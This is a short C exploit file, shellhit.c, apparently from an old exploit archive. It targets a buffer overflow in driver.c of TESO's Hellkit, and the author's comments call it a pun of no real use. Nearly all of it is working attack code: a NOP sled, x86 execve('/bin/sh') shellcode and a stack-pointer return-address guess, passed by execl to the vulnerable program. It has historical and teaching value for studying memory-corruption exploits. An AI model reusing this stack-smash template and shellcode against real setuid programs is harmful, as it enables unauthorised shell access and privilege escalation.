shellhit.c - TESO Hellkit contains a buffer overflow - exploit is just meant to be funny. To all scriptkiddies: You won't get root from this, go and find something more useful.
a3e149bc4123017c3cbb604fcda0c4db3c04f6e279d5b9a75f8c0c48fe6dd47f
/*
TESO crew their hellkit contains a silly buffer overflow in driver.c
This exploit is obviously a pun. Mixter's shellgen.c got exploited
by other people some time ago, so why not teso's hellkit :)
Hellkit r0x btw ;)
To all scriptkiddies: You won't get root from this, go and find something
more usefull.
Shouts go out to:
- Buffer0verfl0w Security
- #phreak.nl
- TESO (they do good work, and they probably know it)
- Dethy, for locating the problem and being helpfull :)
- #platform
Lots of love goes to: Hester
Cheers,
Scrippie - ronald@grafix.nl
*/
#include <stdio.h>
#define NUMNOPS 970 /* Not exactly true, space is made for the
shellcode */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}
main(int argc, char **argv)
{
char overflow[2000]; /* Bla bla, I suck too much memory */
int i, offset=-2000; /* Offset works on my box */
long addr;
if(argc>1) offset = atoi(argv[1]);
for(i=0;i<NUMNOPS-sizeof(shellcode);i++) {
overflow[i] = 0x90;
}
overflow[i] = 0x00;
strcat(overflow, shellcode);
addr = get_sp() - offset;
printf("HellKit Overflow - Scrippie\n");
printf("This is a pun - it's got no use\n");
printf("Resulting address: 0x%x\n", addr);
memcpy(overflow + strlen(overflow), (void *) &addr, 4);
if((execl("./driver", "hackme", overflow, NULL)) == -1) {
perror("execl()");
exit(-1);
}
exit(0);
}